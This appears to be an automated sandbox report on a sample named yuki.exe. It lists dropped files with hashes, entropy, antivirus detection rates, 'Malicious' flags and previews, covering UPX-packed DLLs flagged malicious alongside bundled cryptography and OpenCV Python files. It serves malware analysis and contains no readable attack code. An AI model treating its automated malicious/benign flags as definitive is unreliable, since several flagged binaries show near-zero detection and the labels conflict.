                                                                                                    Category:dropped
                                                                                                    Size (bytes):40448
                                                                                                    Entropy (8bit):7.867941911378633
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:DG2Z8o+8FiFF0grM5z6BBPNWjLDKZ2MW96vLejBuzMsidkERB4Uppu:DG2Z8ogFF9BPsGZ2MWiIuzMs2B4Uq
                                                                                                    MD5:044AA54C359F57F827647C7EEE04D267
                                                                                                    SHA1:88B6E44D3C40173A06E9E3378494E0EB9B06D8E0
                                                                                                    SHA-256:F03556DE88030FA893711275B4DAEFF39F1F14C30B1967EA3A9B140CC8632BB5
                                                                                                    SHA-512:D22CAD7389020F0ED895FFCFA6CC17F3A6CB7F73FFEBB5636DF7B64D6AB3CAF7C503E7D407F47F4250FD5981156789B2F7235EB49830B1D86A268EF2C53ED441
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........yB....................7...............7.......7.......7.......6..........C....6.......6.......6.......6......Rich............................PE..d....$.g.........." ...).............H.......................................p............`..........................................b..d....`.......`......................<c.......................................T..@...........................................UPX0....................................UPX1................................@....rsrc........`......................@..............................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4
                                                                                                    Entropy (8bit):1.5
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Mn:M
                                                                                                    MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                    SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                    SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                    SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                    Malicious:false
                                                                                                    Preview:pip.
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5440
                                                                                                    Entropy (8bit):5.074230645519915
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:DloQIUQIhQIKQILbQIRIaMPktjaVxsxA2TLLDmplH7dwnqTIvrUmA0JQTQCQx5KN:RcPuP1srTLLDmplH7JTIvYX0JQTQ9x54
                                                                                                    MD5:C891CD93024AF027647E6DE89D0FFCE2
                                                                                                    SHA1:01D8D6F93F1B922A91C82D4711BCEFB885AD47B0
                                                                                                    SHA-256:EB36E0E4251E8479EF36964440755EF22BEDD411BA87A93F726FA8E5BB0E64B0
                                                                                                    SHA-512:3386FBB3DCF7383B2D427093624C531C50BE34E3E0AA0984547B953E04776D0D431D5267827F4194A9B0AD1AB897869115623E802A6A1C5D2AE1AD82C96CCE71
                                                                                                    Malicious:false
                                                                                                    Preview:Metadata-Version: 2.3.Name: cryptography.Version: 43.0.3.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: Apache Software License.Classifier: License :: OSI Approved :: BSD License.Classifier: Natural Language :: English.Classifier: Operating System :: MacOS :: MacOS X.Classifier: Operating System :: POSIX.Classifier: Operating System :: POSIX :: BSD.Classifier: Operating System :: POSIX :: Linux.Classifier: Operating System :: Microsoft :: Windows.Classifier: Programming Language :: Python.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Classifier: Programming Language :: Python :: 3.7.Classifier: Programming Language :: Python :: 3.8.Classifier: Programming Language :: Python :: 3.9.Classifier: Programming Language :: Python :: 3.10.Classifier: Programming Language :: Python :: 3.11.Classifier: Programming Language :: Python :: 3.12.Classif
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:CSV text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):15579
                                                                                                    Entropy (8bit):5.5664904316569785
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:1XeTBL1z5jF4E9VqhXJZ4WPB6s7B0Ppz+NX6in5Lqw/I+B:1XkL1hCEsJrPB6s7B0Ppz+96innVB
                                                                                                    MD5:4DECFB7B4491D572BFEF7359B48F44FC
                                                                                                    SHA1:A4A4D4BF35021D7402922CA58E1E29AE564524FD
                                                                                                    SHA-256:2538AB429E324FDDEAC70C8C511E24E9FAF5DC8D531D910B1A6FF17C13C5D536
                                                                                                    SHA-512:CE05550E47B778EAB691191A9B08C53F4BE8C3F371C5831B901D17535237A45E46F8362A1BC365DBDEF45FF7AFF475EAA4517FB43F715A4F92481F014EF2E18F
                                                                                                    Malicious:false
                                                                                                    Preview:cryptography-43.0.3.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..cryptography-43.0.3.dist-info/METADATA,sha256=6zbg5CUehHnvNpZEQHVe8ivt1BG6h6k_cm-o5bsOZLA,5440..cryptography-43.0.3.dist-info/RECORD,,..cryptography-43.0.3.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..cryptography-43.0.3.dist-info/WHEEL,sha256=8_4EnrLvbhzH224YH8WypoB7HFn-vpbwr_zHlr3XUBI,94..cryptography-43.0.3.dist-info/license_files/LICENSE,sha256=Pgx8CRqUi4JTO6mP18u0BDLW8amsv4X1ki0vmak65rs,197..cryptography-43.0.3.dist-info/license_files/LICENSE.APACHE,sha256=qsc7MUj20dcRHbyjIJn2jSbGRMaBOuHk8F9leaomY_4,11360..cryptography-43.0.3.dist-info/license_files/LICENSE.BSD,sha256=YCxMdILeZHndLpeTzaJ15eY9dz2s0eymiSMqtwCPtPs,1532..cryptography/__about__.py,sha256=-FkHKD9mSuEfH37wsSKnQzJZmL5zUAUTpB5OeUQjPE0,445..cryptography/__init__.py,sha256=mthuUrTd4FROCpUYrTIqhjz6s6T9djAZrV7nZ1oMm2o,364..cryptography/__pycache__/__about__.cpython-312.pyc,,..cryptography/__pycache__/__ini
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):94
                                                                                                    Entropy (8bit):5.016084900984752
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:RtEeX5pGogP+tkKciH/KQb:RtvoTWKTQb
                                                                                                    MD5:C869D30012A100ADEB75860F3810C8C9
                                                                                                    SHA1:42FD5CFA75566E8A9525E087A2018E8666ED22CB
                                                                                                    SHA-256:F3FE049EB2EF6E1CC7DB6E181FC5B2A6807B1C59FEBE96F0AFFCC796BDD75012
                                                                                                    SHA-512:B29FEAF6587601BBE0EDAD3DF9A87BFC82BB2C13E91103699BABD7E039F05558C0AC1EF7D904BCFAF85D791B96BC26FA9E39988DD83A1CE8ECCA85029C5109F0
                                                                                                    Malicious:false
                                                                                                    Preview:Wheel-Version: 1.0.Generator: maturin (1.7.0).Root-Is-Purelib: false.Tag: cp39-abi3-win_amd64.
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):197
                                                                                                    Entropy (8bit):4.61968998873571
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:hWDncJhByZmJgXPForADu1QjygQuaAJygT2d5GeWreLRuOFEXAYeBKmJozlMHuO:h9Co8FyQjkDYc5tWreLBF/pn2mH1
                                                                                                    MD5:8C3617DB4FB6FAE01F1D253AB91511E4
                                                                                                    SHA1:E442040C26CD76D1B946822CAF29011A51F75D6D
                                                                                                    SHA-256:3E0C7C091A948B82533BA98FD7CBB40432D6F1A9ACBF85F5922D2F99A93AE6BB
                                                                                                    SHA-512:77A1919E380730BCCE5B55D76FBFFBA2F95874254FAD955BD2FE1DE7FC0E4E25B5FDAAB0FEFFD6F230FA5DC895F593CF8BFEDF8FDC113EFBD8E22FADAB0B8998
                                                                                                    Malicious:false
                                                                                                    Preview:This software is made available under the terms of *either* of the licenses.found in LICENSE.APACHE or LICENSE.BSD. Contributions to cryptography are made.under the terms of *both* these licenses..
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):11360
                                                                                                    Entropy (8bit):4.426756947907149
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:nUDG5KXSD9VYUKhu1JVF9hFGvV/QiGkS594drFjuHYx5dvTrLh3kTSEnQHbHR:UIvlKM1zJlFvmNz5VrlkTS0QHt
                                                                                                    MD5:4E168CCE331E5C827D4C2B68A6200E1B
                                                                                                    SHA1:DE33EAD2BEE64352544CE0AA9E410C0C44FDF7D9
                                                                                                    SHA-256:AAC73B3148F6D1D7111DBCA32099F68D26C644C6813AE1E4F05F6579AA2663FE
                                                                                                    SHA-512:F451048E81A49FBFA11B49DE16FF46C52A8E3042D1BCC3A50AAF7712B097BED9AE9AED9149C21476C2A1E12F1583D4810A6D36569E993FE1AD3879942E5B0D52
                                                                                                    Malicious:false
                                                                                                    Preview:. Apache License. Version 2.0, January 2004. https://www.apache.org/licenses/.. TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION.. 1. Definitions... "License" shall mean the terms and conditions for use, reproduction,. and distribution as defined by Sections 1 through 9 of this document... "Licensor" shall mean the copyright owner or entity authorized by. the copyright owner that is granting the License... "Legal Entity" shall mean the union of the acting entity and all. other entities that control, are controlled by, or are under common. control with that entity. For the purposes of this definition,. "control" means (i) the power, direct or indirect, to cause the. direction or management of such entity, whether by contract or. otherwise, or (ii) ownership of fifty percent (50%) or more of the. outstanding shares, or (iii) beneficial ow
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1532
                                                                                                    Entropy (8bit):5.058591167088024
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:MjUnoorbOFFTJJyRrYFTjzMbmqEvBTP4m96432s4EOkUTKQROJ32s3yxsITf+3tY:MkOFJSrYJsaN5P406432svv32s3EsIqm
                                                                                                    MD5:5AE30BA4123BC4F2FA49AA0B0DCE887B
                                                                                                    SHA1:EA5B412C09F3B29BA1D81A61B878C5C16FFE69D8
                                                                                                    SHA-256:602C4C7482DE6479DD2E9793CDA275E5E63D773DACD1ECA689232AB7008FB4FB
                                                                                                    SHA-512:DDBB20C80ADBC8F4118C10D3E116A5CD6536F72077C5916D87258E155BE561B89EB45C6341A1E856EC308B49A4CB4DBA1408EABD6A781FBE18D6C71C32B72C41
                                                                                                    Malicious:false
                                                                                                    Preview:Copyright (c) Individual contributors..All rights reserved...Redistribution and use in source and binary forms, with or without.modification, are permitted provided that the following conditions are met:.. 1. Redistributions of source code must retain the above copyright notice,. this list of conditions and the following disclaimer... 2. Redistributions in binary form must reproduce the above copyright. notice, this list of conditions and the following disclaimer in the. documentation and/or other materials provided with the distribution... 3. Neither the name of PyCA Cryptography nor the names of its contributors. may be used to endorse or promote products derived from this software. without specific prior written permission...THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND.ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED.WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOS
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2229248
                                                                                                    Entropy (8bit):7.999624406237195
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:49152:IbSlg7EtPbwG7Qtugc58UQG/0ym73KDYo/6cUWnyO:cSCkwG7Gub8URsF6YoPUE
                                                                                                    MD5:B3ADED1526439F1938D4D976493EF600
                                                                                                    SHA1:0138AE2EC0FAE83F8644A06C0EAD66D437BE714D
                                                                                                    SHA-256:8CBF7C62F13D73236FDCE5BE0EF642F197D41B1C3A0F96094109E56B3A09099B
                                                                                                    SHA-512:5E146DC71578C97A95D3E25EABB5ADD6B84903D0A40035162F9B48F454C4648AA3AC531BAFFDA36F5BD0ECF52903C6F7CEC8B7FE503B21BF29C7BDF821A6DDE3
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 8%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r.b.6...6...6...?..$...&9..4...&9..2...&9..>...&9..'...}...8...Y<..5...6...2...~8..I...6.......~8..7...~8..7...Rich6...........PE..d......g.........." ...)..".......V.0wx...V...................................x...........`...........................................x.......x.............. s...............x.$...........................H.x.(.....x.@...........................................UPX0......V.............................UPX1......"...V...!.................@...UPX2..........x.......!.............@..............................................................................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6793
                                                                                                    Entropy (8bit):4.966446669677776
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cHqnQbu/3aOjcEYIL9GE6AUmZris46/B5aVOQOo2/nH/h5M966GMBWtReWE3uSI3:2qQYaOjIKtc6/Bb/H/h2BWtc93k
                                                                                                    MD5:6F043AFF1EDD20D3C9D6398F936FBF58
                                                                                                    SHA1:7149D2D20E1EB8C10C5D2BDB8EDA23551FC82650
                                                                                                    SHA-256:957A91BFD98FFB07A10CD789B7C5C46806568476B61E34C7AD56A00092B981A5
                                                                                                    SHA-512:7358DBA479899DBC3AFB955903820D2A7A54B9C398BF5D4565C8DC044241821EDD621D7416862AF396DB4216373B1E8AAC00EB78046FCC3CC2396AA02CD6947B
                                                                                                    Malicious:false
                                                                                                    Preview:'''..OpenCV Python binary extension loader..'''..import os..import importlib..import sys....__all__ = []....try:.. import numpy.. import numpy.core.multiarray..except ImportError:.. print('OpenCV bindings requires "numpy" package.').. print('Install it via command:').. print(' pip install numpy').. raise....# TODO..# is_x64 = sys.maxsize > 2**32......def __load_extra_py_code_for_module(base, name, enable_debug_print=False):.. module_name = "{}.{}".format(__name__, name).. export_module_name = "{}.{}".format(base, name).. native_module = sys.modules.pop(module_name, None).. try:.. py_module = importlib.import_module(module_name).. except ImportError as err:.. if enable_debug_print:.. print("Can't load Python code for module:", module_name,.. ". Reason:", err).. # Extension doesn't contain extra py code.. return False.... if base in sys.modules and not hasattr(sys.modules[base], name):..
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):748
                                                                                                    Entropy (8bit):5.110506159030977
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:WSolITEO+RNIdjcFMlYFXe2LirYKMLFxAe5bHMnQBwmuTD9+sXWeZKMLFxAe5biw:MlY+34jamr0L7Ae5oJP9+oJL7Ae5mU9L
                                                                                                    MD5:E8ED8F25854821C8910BCB8308507DCE
                                                                                                    SHA1:8A3AC32D3DF44794E8A834A6B6A8A1ED3F3AA5F7
                                                                                                    SHA-256:DE28C7B5213CCA148F09469916584611B3D66C1C8C432880259D6A3A92380213
                                                                                                    SHA-512:F3F36EDF288A870F5E1F14F3B1113031721E12F30BF235B0E5385711E2BF7F08D0123E6AB14600AB069D2E692D81B7ABC3692FB69EED34374FEFAB3B24F03D86
                                                                                                    Malicious:false
                                                                                                    Preview:PYTHON_EXTENSIONS_PATHS = [.. LOADER_DIR..] + PYTHON_EXTENSIONS_PATHS....ci_and_not_headless = False....try:.. from .version import ci_build, headless.... ci_and_not_headless = ci_build and not headless..except:.. pass....# the Qt plugin is included currently only in the pre-built wheels..if sys.platform.startswith("linux") and ci_and_not_headless:.. os.environ["QT_QPA_PLATFORM_PLUGIN_PATH"] = os.path.join(.. os.path.dirname(os.path.abspath(__file__)), "qt", "plugins".. )....# Qt will throw warning on Linux if fonts are not found..if sys.platform.startswith("linux") and ci_and_not_headless:.. os.environ["QT_QPA_FONTDIR"] = os.path.join(.. os.path.dirname(os.path.abspath(__file__)), "qt", "fonts".. )..
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):123
                                                                                                    Entropy (8bit):5.165836377533827
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:JSxrsr+A6+Ei7/erj5Erj+7IE3KTY5O8nkz6+Eov:arsrFEoidAM3Kk5PkBEy
                                                                                                    MD5:FCB98FFC6E408D714FC0E0555B1FB530
                                                                                                    SHA1:832A187368BED379942A0A6EF77D8057166DF7F6
                                                                                                    SHA-256:D9E401B9A67304D69C48A494A485D106B534E02BF5776211C09F09BD671B295D
                                                                                                    SHA-512:C679EB68F62D4D4361FB55BE7B052FCD3AD85BFF9DFE9ED27AFD7014C992F26851BF02E7A587AA411D08593C69A197603FAD685E976D2948F35240D5F87DC3F8
                                                                                                    Malicious:false
                                                                                                    Preview:import os....BINARIES_PATHS = [.. os.path.join(os.path.join(LOADER_DIR, '../../'), 'x64/vc14/bin')..] + BINARIES_PATHS..
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):16587776
                                                                                                    Entropy (8bit):7.999578323833516
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:393216:9+KZi3bQ23tzMQvoxc2shNXyDCiE9tLpWK5:9+gaM23tzBmyx
                                                                                                    MD5:503B3E3E4184CBA2F501905D0D277DBB
                                                                                                    SHA1:DA353686EDFDA2C8702D66530EE38D6050A0BDA3
                                                                                                    SHA-256:E4612C6D1FD4ECC82D8D2177E1A68EF142DA9B521A5DC2D41F43C7AD5106C402
                                                                                                    SHA-512:16DCFC10095AFD97C19EF416CE2E72F255166EC4CC6145DE8F2F58F58D54C9236DB579552A73B52FC98E16393819D30F05094C63B3B4082A0D279C1C542E1469
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......k)../H../H../H..B...cH..B...0H..B...H...?.*H.....aH.....VH......H..B...*H..u.5.~K../H..k..B...3H.....=I..=..,H../H..YI......J......H......H......H..Rich/H..........PE..d....{pf.........." .........@......@....................................................`.............................................d1..................pc................................................(..................................................UPX0....................................UPX1...............................@....rsrc....@.......8..................@..............................................................................................................................................................................................................................................................................................................4.24.UPX!.$..
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):73
                                                                                                    Entropy (8bit):4.5164686969838375
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:JSxrGSCcurj5ErAwGfnJFB:arGSLSdAAb
                                                                                                    MD5:734F2F32C81B5CEDE1098394DAB581B5
                                                                                                    SHA1:E07450D3F1924078DD09E0B1DEA8DD671DFE8801
                                                                                                    SHA-256:F4CE16721ED7F623A4DCC443BA600D1856DB610CB2C3D53C13A8CA028CC68F6D
                                                                                                    SHA-512:C0C9ADD6A1CD47F34C91B12AD369E887CFD28859824D258E1EED0C3495378DD950E214F8A540D66CD555ED8EFC810418DF3F13E09765D24D6FA26B09B44857C0
                                                                                                    Malicious:false
                                                                                                    Preview:import os....haarcascades = os.path.join(os.path.dirname(__file__), "")..
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10621
                                                                                                    Entropy (8bit):4.717526275196451
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:mIntUjnLP6P7B4D7BP7Bb7BewmDraPt0C2Vqed/:m2eBNYraPt0C2V9Z
                                                                                                    MD5:3A4D80801F49E3A13903811C9E59018A
                                                                                                    SHA1:0227B9F1FB7E900777BD8951404075DF2D6D3447
                                                                                                    SHA-256:74F5FD2A142A31B0A4707B70C0BE3637F0FBF8A940EEC4372E7BA87E5A5CEDB8
                                                                                                    SHA-512:F79D2C216008FE8EC1F9C28575776C81B5FAC63B18996803B76B73EAF088800FE4E46B4C18F7CE9730177549FD5402421719FA2B8FFED73EE60EBACAE4D5CCB1
                                                                                                    Malicious:false
                                                                                                    Preview:__all__ = ['op', 'kernel']....import sys..import cv2 as cv....# NB: Register function in specific module..def register(mname):.. def parameterized(func):.. sys.modules[mname].__dict__[func.__name__] = func.. return func.. return parameterized......@register('cv2.gapi')..def networks(*args):.. return cv.gapi_GNetPackage(list(map(cv.detail.strip, args)))......@register('cv2.gapi')..def compile_args(*args):.. return list(map(cv.GCompileArg, args))......@register('cv2')..def GIn(*args):.. return [*args]......@register('cv2')..def GOut(*args):.. return [*args]......@register('cv2')..def gin(*args):.. return [*args]......@register('cv2.gapi')..def descr_of(*args):.. return [*args]......@register('cv2')..class GOpaque():.. # NB: Inheritance from c++ class cause segfault... # So just aggregate cv.GOpaqueT instead of inheritance.. def __new__(cls, argtype):.. return cv.GOpaqueT(argtype).... class Bool():.. def __new__(self):..
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):271
                                                                                                    Entropy (8bit):4.627093215673309
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:SoSvYFyMXS/qdadew7mZ6ALNCpvdYZ4un:kUFuT7mZlCpFw4u
                                                                                                    MD5:EED4002FFE913424133D8F19FDF1C2A8
                                                                                                    SHA1:F232D4C5ACF73885D8E0D70418FB2E1481D9271B
                                                                                                    SHA-256:FF583A5874BE8F848E73C2F61B3A71680995926479C9BC436E6565C5CCE7CA07
                                                                                                    SHA-512:115F32B21E99DEC9B50C766CC685F9387A0D0C1611A41540CA23B71579E2963E04A1E940C6C8F3447A26006DBC45F17013A7FFE97BE620B74F1CF20A21505B8E
                                                                                                    Malicious:false
                                                                                                    Preview:# flake8: noqa..import os..import sys....if sys.version_info[:2] >= (3, 0):.. def exec_file_wrapper(fpath, g_vars, l_vars):.. with open(fpath) as f:.. code = compile(f.read(), os.path.basename(fpath), 'exec').. exec(code, g_vars, l_vars)..
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1164
                                                                                                    Entropy (8bit):4.96613832345308
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:7TYCO610sctIsPo5k/1i0N0QhKNAhno3oBoIVbOXono6RnZB:gKceCzN0QhKNuniM5iC/r
                                                                                                    MD5:8A38C1B85454BB467D3BE71BC0EE3486
                                                                                                    SHA1:0D4A8B9B136E3A123D3BC38B484086C8AF07A15A
                                                                                                    SHA-256:C44707EA1C76F35518AE572B6C1989D76C2ADA7E850432E41805DFE112D4E306
                                                                                                    SHA-512:94F6E6E8F5CA41677F69487B8C8EF8C2C004250524ECBD46D1407DA47ABEC05D54A765D79E1633EAECF5A3F9815B7A4604E674D6020442A72BC038FECD93DDFA
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:__all__ = []....import numpy as np..import cv2 as cv..from typing import TYPE_CHECKING, Any....# Same as cv2.typing.NumPyArrayNumeric, but avoids circular dependencies..if TYPE_CHECKING:.. _NumPyArrayNumeric = np.ndarray[Any, np.dtype[np.integer[Any] | np.floating[Any]]]..else:.. _NumPyArrayNumeric = np.ndarray....# NumPy documentation: https://numpy.org/doc/stable/user/basics.subclassing.html......class Mat(_NumPyArrayNumeric):.. '''.. cv.Mat wrapper for numpy array..... Stores extra metadata information how to interpret and process of numpy array for underlying C++ code... '''.... def __new__(cls, arr, **kwargs):.. obj = arr.view(Mat).. return obj.... def __init__(self, arr, **kwargs):.. self.wrap_channels = kwargs.pop('wrap_channels', getattr(arr, 'wrap_channels', False)).. if len(kwargs) > 0:.. raise TypeError('Unknown parameters: {}'.format(repr(kwargs))).... def __array_finalize__(self, obj):.. if obj is Non
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):38
                                                                                                    Entropy (8bit):3.968211974414884
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:1LT2QbQNQ4yL9v:1LT2Q8NQ4yJ
                                                                                                    MD5:C6B0244719659C5EDEC0592AF112032A
                                                                                                    SHA1:6BD926FE0C853A9938BDB5D9537BD88FD1EF5401
                                                                                                    SHA-256:495BD79594CCE174673E372C85C4DD8F4FFDF2B3A73FD4623955B0D55DE0D462
                                                                                                    SHA-512:28D80015309AC1AE19F048E9461D4D04B85CE16B9E68C58D7608351A39B8D3EC0235FCCFD928B0349082C702D890B6C6ABD36B8030A176BF05888AE8C493B545
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:from .version import get_ocv_version..
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):95
                                                                                                    Entropy (8bit):4.525707419533802
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:JS4iydoKE4yLYfg+4zxNG364yLA9E5HJwv:mIXE4y0YpE6405pwv
                                                                                                    MD5:2D3125F1843A670B9F3229A7BC362816
                                                                                                    SHA1:E884BC3D05E5E732D1308DE67AA5F96BBF4FC69F
                                                                                                    SHA-256:C93A418793FCB15B9B4316C0741B8336740E490E94F3B7D1EBE8CD5F6F23815C
                                                                                                    SHA-512:BFDCF6BFC1D82E3ACAF625B5940CA169784427712F14895FD6CA92CC9C864F1A894FECF97BF2AFA6FC5CF4ABA9738A302D30024BC192F85025989C0D93A8B540
                                                                                                    Malicious:false
                                                                                                    Preview:import cv2......def get_ocv_version():.. return getattr(cv2, "__version__", "unavailable")..
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):8551936
                                                                                                    Entropy (8bit):7.999971581252399
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:196608:94Lc9tk6+OfCa1hgAnqWYUum/2WRJ4NpF/owVZqmZ6PH:OLMa9OKEhqBU47Rowjo
                                                                                                    MD5:380058D8AB214582E2E92E021806612D
                                                                                                    SHA1:3D770B5814D8169C7B28C23B327B7B1AC0A2BCCB
                                                                                                    SHA-256:8BCB028C3D0E8E2F0C7A6F8815EDA4D01320469004D9D0F1E0C4976C8C63E454
                                                                                                    SHA-512:D78E8386569E052C212CE5679444AF86615435DBB75DAEC8B650B4BDCB8D9F5AFDDF87BDCD3BE3D11219589862DAAE1FE9AF3FEB219BB3385283D3A31E6695F5
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."..."...........`G.........p.............................p................ .....................................he......<c..,....`..<....0..............Dg..............................pS..(...................................................UPX0...................................UPX1.............t..................@....rsrc........`.......v..............@...4.24.UPX!.$.._...m..3.*..,g.............$#=...E..[... .s.G9]..;...$....G....a...e^L......[.R.i.(.\zUm..k.#.3.)+."n;I.9..d....., .z.Iy..a.@:...f..L..Q.wv.2.@.....!)1...*%.......OT..n.&.1....K9...L...e.{{...P.........m<-+z...t^..}....7.-w....G...!.X..5...+..4....y....<.%.^....4},.....w^ ..#...=...o....g.P..Bh.T.....GxU.\..$.e..._..Mw....D..)....;zVD...7..8...S....p3..$.....l|.._.#w.-.|.Gd...>...3.]..<....B*..v.Z..l..s...o.........i.V...L=.].h...=J.s....y....yi...>.F.]
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5434
                                                                                                    Entropy (8bit):5.152336645688798
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cuACTXc/yidAKdpJUiA7VDpHGN5RME0Kdc:cKzji+KsRcRME0N
                                                                                                    MD5:BAD2104D74F1DAF8E79AC3BC0FA5A3B1
                                                                                                    SHA1:F9D2CAFE013C5A3938487065F598515FC2B3FA17
                                                                                                    SHA-256:9DE1E504724D2FF1CFF305E7EFDD8D09A8D636734149AA4AF9DDF406975119B9
                                                                                                    SHA-512:0098F8A91A365D927BA5B25C5B07859B800F0AF876AE43D56685CF839C53E8CD115F34303B897310CA86980D1543F5A40C15BD784F81169AAC42B1E9A0AC2956
                                                                                                    Malicious:false
